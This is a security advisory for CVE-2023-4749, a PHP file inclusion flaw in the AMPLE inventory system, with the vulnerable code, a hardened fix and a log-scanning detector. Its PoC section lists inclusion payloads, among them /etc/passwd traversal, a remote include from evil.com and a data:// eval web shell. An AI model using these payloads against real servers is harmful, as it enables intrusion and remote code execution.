【CVE-2023-4749】Open Source AMPLE Inventory Management System has a File Inclusion Vulnerability

Update

Update 2023/09/04

The CVE record has been accepted and published by MITRE:

CVE Record: CVE-2023-4749

NVD: CVE-2023-4749

Update 2023/09/03

On September 3rd, I submitted the vulnerability to VulDB and was assigned a CVE number.

Vuln_Author: WEI(ギカク)

AMPLE

AMPLE is an open-source inventory management system written in PHP for tracking and monitoring stock.

The following features are included:

  • Real-time Stock Visibility: Keep track of your inventory levels in real-time, ensuring you never run out of stock or overstock.
  • Accurate Sales Tracking: Monitor sales patterns, identify popular products, and make data-driven decisions.
  • Order Management: Process orders efficiently, reducing fulfillment time and enhancing customer satisfaction.
  • Cost Savings: Minimize losses due to overstocking, spoilage, or theft, maximizing profitability.

File Inclusion Vulnerability

The file inclusion vulnerability is in index.php, which builds an include path from the page query parameter. The relevant source code:

<?php require_once 'inc/header.php'; ?>
<?php require_once 'inc/sidebar.php'; ?>

  <!-- Content Wrapper. Contains page content -->

  <?php 
        if (isset($_GET['page'])) {
          // Untrusted input: only a fixed prefix and suffix are added, nothing is validated
          $page ='pages/' .$_GET['page'].'.php';

        }else{
          $page = 'pages/dashboard.php';
        }
        // file_exists() only confirms the path resolves; it does not stop ../ traversal
        if (file_exists($page)) {
          require_once $page;   // sink: the attacker-controlled path is executed as PHP
        }else{
          require_once 'pages/error_page.php';
        }
 ?>
  <!-- Control Sidebar -->
  <aside class="control-sidebar control-sidebar-dark">
    <!-- Control sidebar content goes here -->
  </aside>
  <!-- /.control-sidebar -->

 <?php require_once 'inc/footer.php'; ?>

This code has a file inclusion vulnerability (CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program).

The value of the page query parameter flows into require_once with only a fixed prefix (pages/) and suffix (.php) added; nothing rejects ../ sequences, so the resulting path can point outside the pages/ directory. The file_exists() check is not a security control: it only confirms that the traversed path resolves to a real file. Because require_once executes whatever it includes as PHP, letting unvalidated user input choose the included file can lead to arbitrary code execution.
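As an added example (not AMPLE's own code, and not part of the original advisory), here is a hardened replacement for the routing block above. The page names in the allowlist are assumptions for illustration; only dashboard and error_page appear in the original index.php. It applies two independent controls: an exact allowlist match, so the raw parameter never reaches the filesystem layer, and a realpath() containment check, so that even a carelessly extended allowlist cannot include anything outside pages/.

```php
<?php
declare(strict_types=1);

// Added example, not AMPLE's own code: a hardened replacement for the
// ?page= routing block of index.php. Two independent controls:
//   1. an allowlist of page names, so the raw parameter never reaches
//      the filesystem layer at all, and
//   2. a realpath() containment check, so that even a carelessly extended
//      allowlist cannot include anything outside pages/.

const PAGES_DIR = __DIR__ . '/pages';

// Hypothetical allowlist: AMPLE's real page names are not listed in the
// advisory, only dashboard and error_page appear in index.php.
const ALLOWED_PAGES = ['dashboard', 'products', 'sales', 'orders'];

/**
 * Map the untrusted ?page= value to a file that may be included.
 * Returns the canonical absolute path of the page file, or null if the
 * request is not for a known page. The raw input is never concatenated
 * into a path that is handed to require_once.
 */
function resolve_page(?string $requested): ?string
{
    $name = $requested ?? 'dashboard';

    // Control 1: exact, type-strict allowlist match. Traversal sequences,
    // wrapper prefixes (php://, data://, http://) and null bytes cannot match.
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }

    // Control 2: defence in depth. realpath() canonicalises the path and
    // returns false for a missing file; the result must lie inside pages/.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Drop-in replacement for the original if/else in index.php.
// Only a scalar string is accepted; ?page[]=x would arrive as an array.
$requested = isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : null;
$page = resolve_page($requested);
if ($page !== null) {
    require_once $page;
} else {
    http_response_code(404);
    require_once __DIR__ . '/pages/error_page.php';
}
```

The allowlist alone closes the vulnerability; the realpath() check is belt and braces, and it also turns a deleted or misnamed page file into a clean 404 instead of a PHP warning. Note that the request value is compared, never transformed: stripping ../ or rejecting a blocklist of wrappers is the kind of fix that gets bypassed.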

PoC

This is a classic file inclusion pattern, so payloads are trivial to construct. They all go in the page parameter of index.php (the cheat-sheet parameter names filename and c are not read by this script):

http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=http://evil.com/malicious.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
http://example.com/index.php?page=data://text/plain,<?php echo "Gikaku";?>
http://example.com/index.php?page=data://text/plain,<?php eval($_POST['cmd']);?>

What actually reaches require_once: index.php does not use the parameter as-is but builds 'pages/' . $_GET['page'] . '.php' and passes that string to file_exists() first. This matters when testing:

  • The pages/ prefix turns each wrapper payload into a relative filesystem path such as pages/php://filter/..., which is not a wrapper URL, and file_exists() does not support the php://, data:// or http:// wrappers in any case (a remote URL would additionally need allow_url_include=On). Those requests therefore land on error_page.php rather than in the include.
  • The appended .php suffix means the first payload is looked up as pages/../../../etc/passwd.php, and a %00 no longer truncates paths on any PHP release since 5.3.4.
  • What the traversal does give is inclusion, and execution, of any existing .php file on the server reachable from pages/, including files the application never meant to expose and any .php file an attacker can get onto the filesystem. That is still CWE-98 and still code execution, just with a narrower reach than the generic list suggests.
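The request shapes listed above are also easy to spot on the defensive side. The following is an added example, not part of the original advisory: a PHP CLI script that scans combined-format access-log lines for requests to index.php whose page parameter could only be an inclusion attempt. The log lines are constructed for the example (203.0.113.0/24 is a documentation range), and the notion of a "legitimate" value, namely a bare page name made of letters, digits, underscore or hyphen, is my assumption based on the pages/<name>.php convention in index.php.

```php
<?php
declare(strict_types=1);

// Added example, not part of the original advisory: scan web-server
// access-log lines for requests abusing index.php?page=.

/**
 * Return the URL-decoded value of one query parameter from a request
 * target such as "/index.php?page=dashboard", or null if it is absent.
 */
function query_param(string $target, string $param): ?string
{
    $q = strpos($target, '?');
    if ($q === false) {
        return null;
    }
    $query = substr($target, $q + 1);
    $hash = strpos($query, '#');
    if ($hash !== false) {
        $query = substr($query, 0, $hash);
    }
    parse_str($query, $params);            // percent-decodes the values
    $value = $params[$param] ?? null;
    return is_string($value) ? $value : null;
}

/**
 * Classify one ?page= value. Returns a reason string when the value can
 * only be an inclusion attempt, or null when it is a plain page name.
 * Assumption: a legitimate page name is a bare identifier (letters,
 * digits, '_' or '-'), which is all that pages/<name>.php needs.
 */
function classify_page_value(string $value): ?string
{
    if (preg_match('/\A[A-Za-z0-9_-]+\z/', $value) === 1) {
        return null;
    }
    if (strpos($value, "\0") !== false) {
        return 'null byte (suffix truncation attempt)';
    }
    if (preg_match('#(\A|[\\\\/])\.\.([\\\\/]|\z)#', $value) === 1) {
        return 'directory traversal';
    }
    if (preg_match('#\A[a-z][a-z0-9+.-]*://#i', $value) === 1) {
        return 'stream wrapper or remote URL';
    }
    return 'unexpected characters';
}

/**
 * Scan combined-format access-log lines. Returns [line index => reason]
 * for every request to index.php whose page parameter was flagged.
 */
function scan_access_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        // The quoted request field: "METHOD target HTTP/x.y"
        if (preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"#', $line, $m) !== 1) {
            continue;
        }
        if (strpos($m[1], 'index.php') === false) {
            continue;
        }
        $value = query_param($m[1], 'page');
        if ($value === null) {
            continue;
        }
        $reason = classify_page_value($value);
        if ($reason !== null) {
            $hits[$i] = $reason;
        }
    }
    return $hits;
}

// Constructed sample: one benign request followed by PoC shapes from the
// advisory; 203.0.113.0/24 is a documentation range, not a real client.
$sample = [
    '203.0.113.5 - - [04/Sep/2023:10:00:01 +0000] "GET /index.php?page=dashboard HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Sep/2023:10:00:02 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 812',
    '203.0.113.5 - - [04/Sep/2023:10:00:03 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 812',
    '203.0.113.5 - - [04/Sep/2023:10:00:04 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fconfig HTTP/1.1" 200 812',
];

foreach (scan_access_log($sample) as $i => $reason) {
    echo "line {$i}: {$reason}\n";
}
```

Run it with php on the command line: the dashboard request is accepted, the two traversal lines (including the percent-encoded one, which parse_str decodes before the check) are reported as directory traversal, and the php://filter line as a stream wrapper. Because the original code appends .php and routes through file_exists(), the flagged requests mostly return error_page.php with a 200, so the response status is not a useful signal; the parameter value is.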